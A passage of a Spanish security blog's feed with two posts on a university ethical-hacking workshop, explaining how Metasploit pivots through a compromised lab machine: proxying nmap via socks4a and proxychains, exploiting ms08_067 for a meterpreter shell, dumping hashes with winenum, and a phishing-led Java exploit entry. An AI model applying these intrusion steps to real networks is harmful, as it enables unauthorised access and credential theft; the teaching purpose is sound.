Pero para &lt;b&gt;conectar el tráfico generado&lt;/b&gt; por la aplicación nmap en el &lt;b&gt;equipo del atacante&lt;/b&gt; &lt;b&gt;con la sesión de metasploit&lt;/b&gt;, se va a utilizar un módulo auxiliar que tiene "metasploit" muy&amp;nbsp;útil&amp;nbsp;para estos casos, se trata de un&amp;nbsp;&lt;b&gt;mini servidor proxy del tipo sock4a&lt;/b&gt;. Los proxy sock4 son capaces de redirigir todas las conexiones generadas en cualquier puerto.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
A continuación se pueden ver los comandos utilizados para activar el servidor sock4a en metasploit:&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="http://1.bp.blogspot.com/-xkSMKYknc4I/UTYa52bUlLI/AAAAAAAAD-Y/eU6J7YIC5g0/s1600/Fase_2_Pivoting_sock4a.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="218" src="http://1.bp.blogspot.com/-xkSMKYknc4I/UTYa52bUlLI/AAAAAAAAD-Y/eU6J7YIC5g0/s640/Fase_2_Pivoting_sock4a.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="font-size: 13px;"&gt;Fase 2: Activando un proxy server sock4 para conectar el nmap a metasploit.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Una vez se haya iniciado (comando run) el servidor en metasploit, se configurar&lt;b&gt; proxychains,&lt;/b&gt; que es un programa que &lt;b&gt;enviará &lt;/b&gt;el tráfico generado por nmap &lt;b&gt;al servidor proxy sock4a&lt;/b&gt;, para que a su vez éste, se lo&amp;nbsp;envié&amp;nbsp;a metasploit quien lo transmitirá al pivote (USR-A).&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-9qHyk-m452Y/UTYbWM1QDII/AAAAAAAAD-g/m2wyU1YLfag/s1600/Fase_2_Pivoting_proxychains.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="76" src="http://1.bp.blogspot.com/-9qHyk-m452Y/UTYbWM1QDII/AAAAAAAAD-g/m2wyU1YLfag/s400/Fase_2_Pivoting_proxychains.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Antes de ejecutar el comando nmap, es necesario configurar el fichero de configuración de proxychains.conf que se puede encontrar en el directorio /etc del equipo Linux BT5.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
Una vez configurado el proxychains, se procede a ejecutar en la consola de Linux, el comando de nmap que realizará un escaneado sencillo sobre la red interna, como si el propio atacante (BT-Linux) estuviera conectado a la red interna, esto gracias a la técnica de "pivoting" de #metasploit.&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-WZtRDb0Jf1E/UTZA8V6sjAI/AAAAAAAAD_I/Cj03kEX0Oik/s1600/Fase_2_Pivoting_nmap_proxychains.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="456" src="http://2.bp.blogspot.com/-WZtRDb0Jf1E/UTZA8V6sjAI/AAAAAAAAD_I/Cj03kEX0Oik/s640/Fase_2_Pivoting_nmap_proxychains.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Fase 2: Exploración con NMAP y proxychains.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
En el ejemplo, se ha utilizado el conjunto de puerto típicos para evitar realizar un escaneado completo de todos los puertos, ahorrando tiempo de ejecución y ancho de banda utilizado, así como minimizar el ruido generado en la red interna de la empresa.&lt;br /&gt;
&lt;br /&gt;
Para demostrar que efectivamente, se esta realizando el pivoting, se realizo una captura de tráfico en el equipo 192.168.2.3 (objetivo).&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-UzULLbUJfxA/UTZBqV041cI/AAAAAAAAD_Q/JYSlp1VTy_0/s1600/Fase_2_Pivoting_captura.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="361" src="http://2.bp.blogspot.com/-UzULLbUJfxA/UTZBqV041cI/AAAAAAAAD_Q/JYSlp1VTy_0/s640/Fase_2_Pivoting_captura.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Fase 2: Capturando tráfico en el equipo objetivo.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
Como se puede observar en la imagen superior, el origen del tráfico capturado por el equipo objetivo procede del equipo comprometido 192.168.3.3 (pivote).&lt;br /&gt;
&lt;br /&gt;
Tras examinar el resultado del scanning del equipo objetivo 192.l68.2.3 se puede sacar la conclusión que casi con toda seguridad ese equipo será un Windows XP con el servicio de carpetas compartidas en red activo.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
Ahora solo queda probar suerte, a ver si el equipo detectado no tiene el sistema actualizado. Vamos por tanto a probar suerte con una vulnerabilidad publicada en el 2008 sobre el protocolo SMB. Para ello hacemos una&amp;nbsp;búsqueda&amp;nbsp;en #Metasploit hasta encontrar la &lt;a href="http://www.metasploit.com/modules/exploit/windows/smb/ms08_067_netapi" target="_blank"&gt;ms08_067_netapi&lt;/a&gt;, la configuramos y se ejecuta &lt;b&gt;¿Qué pasará?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;Fase 3: Atacando a nuestro Objetivo&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
A continuación, se deja unas capturas de pantalla, con el resultado de configurar y ejecutar dicha vulnerabilidad:&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-STHLVNe1TFE/UTZDe485KXI/AAAAAAAAD_Y/ZXbZJ-lEVFY/s1600/Fase_3_Atacando_objetivo.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="406" src="http://1.bp.blogspot.com/-STHLVNe1TFE/UTZDe485KXI/AAAAAAAAD_Y/ZXbZJ-lEVFY/s640/Fase_3_Atacando_objetivo.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Fase 3: Explotando un equipo en la red DMZ a través del pivoting.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
Una de las curiosidades, que se pueden observar en la imagen superior son:&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Utilización del puerto 443&lt;/li&gt;
&lt;li&gt;Utilización de bind_tcp&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
El utilizar el puerto 443, para conectar la shell remota con el equipo al que se va a intentar atacar, y bind_tcp, significa que la conexión la va a iniciar el atacante, que en este caso, y debido a la técnica del pivoting, será originada por el equipo USR-A comprometido.&lt;/div&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-PDP52DK2auU/UTZKxMlHSHI/AAAAAAAAD_g/UiHwnNlsjss/s1600/Fase_3_Atacando_objetivo_2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="154" src="http://3.bp.blogspot.com/-PDP52DK2auU/UTZKxMlHSHI/AAAAAAAAD_g/UiHwnNlsjss/s640/Fase_3_Atacando_objetivo_2.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Fase 3: Ataque a un equipo de la red interna utilizando el Pivoting.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
Se ha tenido exito en el ataque, se ha logrado llegar a la red 192.168.2.0/24, al tener comprometido un equipo de la red, con una shel remota "meterpreter", que se encuentra activa mientras el "pivote" (USR-A) se mantenga conectado y comprometido.&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-JUkbmBiSsTY/UTZMEKFgW5I/AAAAAAAAD_o/oOQSYphRA08/s1600/Fase_3_Atacando_objetivo_3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="322" src="http://4.bp.blogspot.com/-JUkbmBiSsTY/UTZMEKFgW5I/AAAAAAAAD_o/oOQSYphRA08/s640/Fase_3_Atacando_objetivo_3.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Fase 3: Objetivo conseguido.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
Una vez tenemos el control sobre el equipo objetivo se realizará la exploración del disco duro y del sistema en busca de información relevante.&lt;br /&gt;
&lt;br /&gt;
Con meterpreter existe la opción de utilizar un script que automatiza todo el proceso, me estoy refiriendo a &lt;b&gt;"winenum" es un script&lt;/b&gt; que vuelca en una carpeta de nuestro disco duro &amp;nbsp;(&lt;b&gt;./msf4/logs/scripts/winenum/&lt;/b&gt;)toda la información que se puede obtener del ordenador comprometido, desde hash de las password, hasta los tokens, pasando por la&amp;nbsp;políticas&amp;nbsp;de dominio, etc. Incluso, &lt;b&gt;detecta si el equipo comprometido es una máquina virtual&lt;/b&gt; o no.&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-6LdaNFAsOog/UTZNrlwKkeI/AAAAAAAAD_w/jQ-aDl8Al0g/s1600/Fase_3_Atacando_objetivo_4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="604" src="http://1.bp.blogspot.com/-6LdaNFAsOog/UTZNrlwKkeI/AAAAAAAAD_w/jQ-aDl8Al0g/s640/Fase_3_Atacando_objetivo_4.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Fase 3: Ejecutando script winenum de meterpreter para obtener información del equipo comprometido.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
Hasta aquí, con el Taller de Hacking, y con el artículo.&lt;br /&gt;
&lt;span style="background-color: #f4cccc; border: 0px; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: 12px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="background-color: #f4cccc; border: 0px; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: 12px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;El contenido de este artículo es meramente informativo y/o con fines educativos,&amp;nbsp;&lt;/span&gt;&lt;u style="background-color: #f4cccc; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: 12px; margin: 0px; padding: 0px;"&gt;no me hago responsable&lt;/u&gt;&lt;span style="background-color: #f4cccc; border: 0px; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: 12px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&amp;nbsp;del uso que de él se pueda hacer.&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #f4cccc; border: 0px; color: #777777; font-family: Arial, 'Century gothic', sans-serif; font-size: 12px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;br /&gt;&lt;/span&gt;
Un Saludo, hasta el próximo evento.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: start;"&gt;
&lt;span style="font-size: x-small;"&gt;&lt;b&gt;Indice:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: start;"&gt;
&lt;span style="font-size: x-small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size: x-small;"&gt;-&lt;a href="http://www.seguridadparatodos.es/2013/03/pivoting-exploracion-de-una-red-remota.html" target="_blank"&gt;[Pivoting] Exploración de una Red remota utilizando un "pivote" con #Metasploit (I)&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: start;"&gt;
&lt;span style="font-size: x-small;"&gt;-&lt;a href="http://www.seguridadparatodos.es/2013/03/Pivoting-metasploit-parte2.html" target="_blank"&gt;[Pivoting] Exploración de una Red remota utilizando un "pivote" con #Metasploit (II)&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=dJ4hwLmfGTQ:PxZ_HN3EzZU:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=dJ4hwLmfGTQ:PxZ_HN3EzZU:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=dJ4hwLmfGTQ:PxZ_HN3EzZU:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=dJ4hwLmfGTQ:PxZ_HN3EzZU:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=dJ4hwLmfGTQ:PxZ_HN3EzZU:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=dJ4hwLmfGTQ:PxZ_HN3EzZU:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=dJ4hwLmfGTQ:PxZ_HN3EzZU:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=dJ4hwLmfGTQ:PxZ_HN3EzZU:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=dJ4hwLmfGTQ:PxZ_HN3EzZU:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=dJ4hwLmfGTQ:PxZ_HN3EzZU:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SXato2/~4/dJ4hwLmfGTQ" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SXato2/~3/dJ4hwLmfGTQ/Pivoting-metasploit-parte2.html</link><author>noreply@blogger.com (Julián Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-7HEe431z2Wo/UTYynTK6GlI/AAAAAAAAD-8/pzPjE6ipkkE/s72-c/Taller_Hacking_Etico_UCO_p2.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadparatodos.es/2013/03/Pivoting-metasploit-parte2.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-6960670203134442408</guid><pubDate>Tue, 05 Mar 2013 16:30:00 +0000</pubDate><atom:updated>2013-03-18T16:27:53.877+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Taller</category><category domain="http://www.blogger.com/atom/ns#">Pentesting</category><category domain="http://www.blogger.com/atom/ns#">Pivoting</category><category domain="http://www.blogger.com/atom/ns#">Java</category><category domain="http://www.blogger.com/atom/ns#">UCO</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Vulnerabilidad</category><category domain="http://www.blogger.com/atom/ns#">Metasploit</category><category domain="http://www.blogger.com/atom/ns#">Exploit</category><category domain="http://www.blogger.com/atom/ns#">Seguridad</category><category domain="http://www.blogger.com/atom/ns#">Seclabs</category><category domain="http://www.blogger.com/atom/ns#">Parte 1</category><title>[Pivoting] Exploración de una Red remota utilizando un pivote con #Metasploit (I)</title><description>&lt;div style="text-align: justify;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;span style="background-color: orange;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;Indice:&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-size: x-small;"&gt;-&lt;a href="http://www.seguridadparatodos.es/2013/03/pivoting-exploracion-de-una-red-remota.html" target="_blank"&gt;[Pivoting] Exploración de una Red remota utilizando un "pivote" con #Metasploit (I)&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;&lt;a href="http://www.seguridadparatodos.es/2013/03/Pivoting-metasploit-parte2.html" target="_blank"&gt;-[Pivoting] Exploración de una Red remota utilizando un "pivote" con #Metasploit (II)&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="background-color: orange;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Hace ya cierto tiempo publique un artículo donde &lt;a href="http://www.seguridadparatodos.es/2011/12/jugando-con-metasploit.html" target="_blank"&gt;jugaba con #Metasploit&lt;/a&gt; para reproducir la vulnerabilidad LNK que utilizó&amp;nbsp;Stuxnet para propagarse e infectar otros equipos vía USB.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-32PTeyEdsSg/UTYylvVnjMI/AAAAAAAAD-0/Mi2QWkuu9xc/s1600/Taller_Hacking_Etico_UCO_p1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="291" src="http://1.bp.blogspot.com/-32PTeyEdsSg/UTYylvVnjMI/AAAAAAAAD-0/Mi2QWkuu9xc/s320/Taller_Hacking_Etico_UCO_p1.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;Ayer 4/Mar/2013 durante mi charla&lt;/b&gt; en el &lt;a href="http://www.seguridadparatodos.es/2013/03/i-taller-de-hacking-etico-universidad.html" target="_blank"&gt;I Taller de Hacking Ético&lt;/a&gt; organizado por &lt;a href="http://www.aconsaseguridad.com/" target="_blank"&gt;ACONSA&lt;/a&gt; y por la Universidad de&amp;nbsp;Córdoba, prepare un escenario &amp;nbsp;(véase la imagen inferior) para demostrar como se puede &lt;b&gt;realizar una intrusión&lt;/b&gt; a un Sistema que aparentemente se encuentra bien protegido.&lt;br /&gt;
&lt;br /&gt;
En la demostración utilice la &lt;b&gt;capacidad&lt;/b&gt; que ofrece metasploit de &lt;b&gt;utilizar un equipo ya comprometido&lt;/b&gt; para usarlo &lt;b&gt;como punto de entrada&lt;/b&gt; y/o ataque a otros elementos de la red a la que pertenece, es decir, utilizarlo de "&lt;b&gt;pivote&lt;/b&gt;" para redireccionar el tráfico y atacar otros puntos de la red interna de una empresa.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;ESCENARIO&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Para que os&amp;nbsp;podáis&amp;nbsp;poner en situación os explicaré brevemente el contexto en el que se realizo el taller, para ello que mejor que una imagen para ilustrar el escenario.&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-KTeP1jXaLNU/UTYLfPTurGI/AAAAAAAAD9o/0MvudvM17f8/s1600/Pivoting_metasploit+(1).png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="474" src="http://4.bp.blogspot.com/-KTeP1jXaLNU/UTYLfPTurGI/AAAAAAAAD9o/0MvudvM17f8/s640/Pivoting_metasploit+(1).png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Escenario charla "Vulnerabilidades vs Exploits"&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
Para el taller, prepare 4 máquinas virtuales:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;ATACANTE&lt;/b&gt;: Un maquina virtual con BT5 instalada y actualizada. Especialmente con metasploit configurado.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;USR_A&lt;/b&gt;: Un equipo WindowsXP SP3, con Java 6 update 13 instalado (sin actualizar por supuesto), y para facilitar la demostración sin antivirus instalado.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;USR_ADMIN&lt;/b&gt;: Un equipo Windows XP SP3, sin antivirus y configurado con carpetas de red compartidas con el equipo USR_A.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;ROUTER / FIREWALL&lt;/b&gt;: En esta ocasión utilice el router/firewall vyatta 6.0. Con la configuración que &amp;nbsp;aparece en la imagen superior, y os explico a continuación.&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;u&gt;&lt;b&gt;Configuración del Router / Firewall:&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
Con el objetivo de crear un entorno de trabajo "real", he utilizado un router/firewall para generar tres zonas diferentes: &lt;b&gt;PUBLIC, PRIVATE y DMZ&lt;/b&gt;. La zona PUBLIC sería la zona de acceso público y simularía la conexión a Internet, la zona DMZ, es la Intranet de la empresa, mientras que la zona Private, es la zona destinada a la conexión de los usuarios de la empresa.&lt;br /&gt;
&lt;br /&gt;
Cada zona, se encuentra configurada en el cortafuegos para controlar el flujo de tráfico entre las mismas, es decir:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;DMZ&lt;/b&gt;: No se permite la conexión con Internet en ninguno de los sentidos, y se tiene limitado el acceso desde la zona PRIVATE, a los puertos 80, 443, 21, 22, 23, 139, 445, es decir, solamente se tiene permitido el tráfico a los protocolos: HTTP, HTTPS, TELNET, SSH, FTP, SMB (carpetas compartidas de Windows).&lt;/li&gt;
&lt;li&gt;&lt;b&gt;PRIVATE&lt;/b&gt;: Se permite la conexión con Internet al completo, al ser un ejemplo,&amp;nbsp;didáctico&amp;nbsp;he&amp;nbsp;creído&amp;nbsp;conveniente, ilustrar que ocurre cuando no se controla la salida de tráfico desde la red interna (PVT) a Internet (PUBLIC).&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="color: orange; font-size: x-small;"&gt;&lt;i style="background-color: #666666;"&gt;*Por supuesto, no se permite establecer ninguna conexión desde la zona PUBLICA hacia la DMZ, o PRIVATE.&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Con esta configuración, se sabe que la empresa no proporciona ningún servicio publico a Internet (WEB), y que sus empleados pueden navegar libremente por Internet. Además, tienen protegidos sus servidores internos (Intranet-DMZ) con unas reglas de cortafuegos "relativamente estrictas".&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Una vez que &lt;b&gt;nos encontramos en "situación"&lt;/b&gt; y tenemos claro cuál será nuestro objetivo (realizar una intrusión en la red interna de la empresa, a ser posible en la DMZ), estamos en condiciones de ver como se puede realizar esto en tres FASES:&lt;/div&gt;
&lt;div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;F1&lt;/b&gt;: &lt;u&gt;El engaño&lt;/u&gt; - Acceder a la red interna aprovechando el eslabón más&amp;nbsp;débil&amp;nbsp;de la cadena el usuario.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;F2&lt;/b&gt;: Explorar la red interna, utilizando el equipo comprometido como un "pivote".&lt;/li&gt;
&lt;li&gt;&lt;b&gt;F3&lt;/b&gt;: Atacar nuestro objetivo y obtener la información.&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;DEMOSTRACIÓN - EJEMPLO PRÁCTICO&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
Para iniciar la intrusión, he utilizado una vulnerabilidad conocida de JAVA, ya que&amp;nbsp;últimamente&amp;nbsp;esta siendo activamente utilizada "in the wild", o lo que es lo mismo, en Internet. Es por ello que me ha parecido muy propio utilizar JAVA como el vector de entrada al Sistema, con lo que podría prepararse un email, enviado a contactos de la empresa, que se podría haber obtenido mediante las redes sociales, y/o otras técnicas de recolección de información.&lt;br /&gt;
&lt;br /&gt;
El caso es que partimos, &lt;b&gt;del punto en el que el USR_A recibirá un e-mail "malicioso" con una URL&lt;/b&gt; que explotará la vulnerabilidad que tiene en su Sistema, en especial JAVA 6 update 13 (&lt;a href="http://cvedetails.com/cve/2010-0886/" rel="nofollow" style="background-color: white; color: #11a2e6; font-family: arial; font-size: 12px; line-height: 16px; margin: 0px; outline: none; padding: 0px; text-align: start; text-decoration: none;"&gt;CVE-2010-0886&lt;/a&gt;,&amp;nbsp;&lt;a href="http://cvedetails.com/cve/2010-1423/" rel="nofollow" style="background-color: white; color: #11a2e6; font-family: arial; font-size: 12px; line-height: 16px; margin: 0px; outline: none; padding: 0px; text-align: start;"&gt;CVE-2010-1423&lt;/a&gt;).&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
&lt;b&gt;FASE 1: Creación de la URL para explotar la vulnerabilidad de JAVA.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
